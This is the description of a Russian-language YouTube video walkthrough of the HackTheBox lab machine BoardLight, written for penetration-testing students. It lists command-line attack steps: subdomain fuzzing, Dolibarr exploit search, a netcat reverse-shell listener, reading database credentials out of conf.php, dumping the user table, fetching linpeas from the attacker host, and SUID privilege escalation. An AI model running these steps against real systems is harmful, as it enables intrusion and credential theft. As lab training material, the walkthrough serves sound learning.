BoardLight {Bypass; DevTools; Gobuster & MSFconsole vhost, Lokal DNS; NetCat, MySQL; SSH, Linpeas}

Поделиться
HTML-код
  • Опубликовано: 18 ноя 2024
  • BoardLight {Ping; Nmap; Dirsearch, "Bypass"; Burp Suite, "DevTools"; Gobuster & MSFconsole vhost, Lokal DNS /etc/hosts; Reverse Shell Attack NetCat (nc)/python, Commands/Files/"Setuid-Bit/FileCapabilities", Mysql -u -p; SSH (ping -c2 8.8.8.8), Linpeas (python -m http.server 9090, wget IP tun0:9090/linpeas.sh), Nano exp.py (./exp.py)}
    __________
    ※ Расписание «Белый хакер» для студентов HACKER - HACKER-82:
    docs.google.co...
    ※ Прохождение/Walkthrough HackTheBox Starting Point:
    codeshare.io/q...
    ※ Блок 1. Основы пентеста. Модуль 1-2:
    docs.google.co...
    __________
    За'bypass'ить?
    Chrome Entwickler Tools (Devtools) für Webdesign - Tutorial
    • Chrome Entwickler Tool...
    Devtools для тестировщика | devtools QA | применение на практике:
    • Devtools для тестировщ...
    Файлы Dolibarr (conf.php):
    Enterprise resource planning (ERP)
    Customer relationship management (CRM)
    Google: dolibar configuration file
    wiki.dolibarr....
    У разных операционных систем различаются и файловые системы:
    Файловая система определяет, как будут организованы кластеры в памяти устройства.
    blog.skillfact...
    Setuid, Setgid, and the Sticky Bit
    www.cbtnuggets...
    unixwork.de/bl...
    How to Manage Linux File Capabilities:
    Возможность/Capabilities - это отдельная и независимая привилегия, которая може
    использоваться процессом для обхода определенных проверок разрешений.
    www.howtoforge...
    Reverse Shell - создание страницы в ручную?
    REVERSE или BIND shell? В чем разница?Какой выбрать?:
    codeby.net/thr...
    Что такое Netcat? Bind Shell и Reverse Shell в действии:
    habr.com/ru/ar...
    Metasploit (msfconsole) exploit and payload?
    __________
    Переводим слова прямо в терминале Linux
    trans -b :ru BoardLight
    trans -b :ru file://subdomains-top1million-110000.txt
    trans :ru en.wikipedia.o...
    man trans
    dzen.ru/a/Y9qz...
    HTB BoardLight Writeup:
    iven.in/posts/...
    [HTB Writeup] BoardLight - Season 5:
    nmap -sV -sC 10.10.11.11
    10.10.11.11/contact.php
    ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u 10.10.11.11/FUZZ -c
    -c - Раскрасить выходные данные. (по умолчанию: false)
    ffuf -w subdomains-top1million-5000.txt -u board.htb/ -H "host:FUZZ.board.htb" -H "Content-Type: application/x-www-form-urlencoded" -fs 15949 -c
    crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 57ms]
    -fs - Фильтрует размер HTTP-ответа. Список размеров и диапазонов
    searchsploit Dolibarr 17
    www.exploit-db...
    SearchSploit - The Manual
    www.exploit-db...
    Google: Dolibarr 17.0.0 exploit
    Google: dolibarr default credentials
    Google: dolibar configuration file (conf.php)
    find * | grep conf.php
    nmap 10.10.11.11 -p3306
    mysql --help
    $ mysql
    SHOW DATABASES
    SELECT dolibarr;
    use djlibarr;
    show tables;
    select * from llx_user
    exit
    ssh larissa@10.10.11.11 -p 22
    larissa@boardlight:~$ groups
    larissa adm
    cd Downloads/
    wget 10.10.tun0:3333/linpeas.sh
    ls -la
    Google: GTFOBins
    Google: enlightenment suid exploit
    • Video
    BoardLight | HackTheBox | #cve-2023-30253:
    sudo openvpn ../lab_An0nyR0y.ovpn
    Wappalyzer (плагин) - шпионить за чужими веб-сайтами и людми на них; посмотреть из чего сделан сайт. {анализ технической стороны веб-сайта, используемые технологии этой страницей} • How to Spy on Website ...
    ifconfig tun0 | grep inet | head -n 1
    ffuf -u "board.htb" -H "Host: FUZZ.board.htb"
    -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fs 15949
    www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ python3 -c 'import pty:pty.spawn("/bin/bash")'
    (kali kali)-[~/Documents/HTB/BoardLight]
    $ stty raw -echo ; fg
    [1] +continued nc -lvnp 7777
    www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
    echo 'dilibarrowner:serverfun2$2023!!' | creds.txt
    mysql -h localhost -P 3306 -u dilibarrowner -p dolibarr
    serverfun2$2023!!
    show databases; - слушаем 3 интерфейс
    use dolibarr;
    show tables;
    desc llx_user;
    select admin, login, pass, pass_crypted, pass_encoding, firstname, lastname from llx_user;
    larissa@boardlight:~$ crontab -l
    find / -type f -perm -u=s 2
    enlightenment suid exploit
    mv ~/Downloads/51180.txt exploit.sh
    • Video

Комментарии •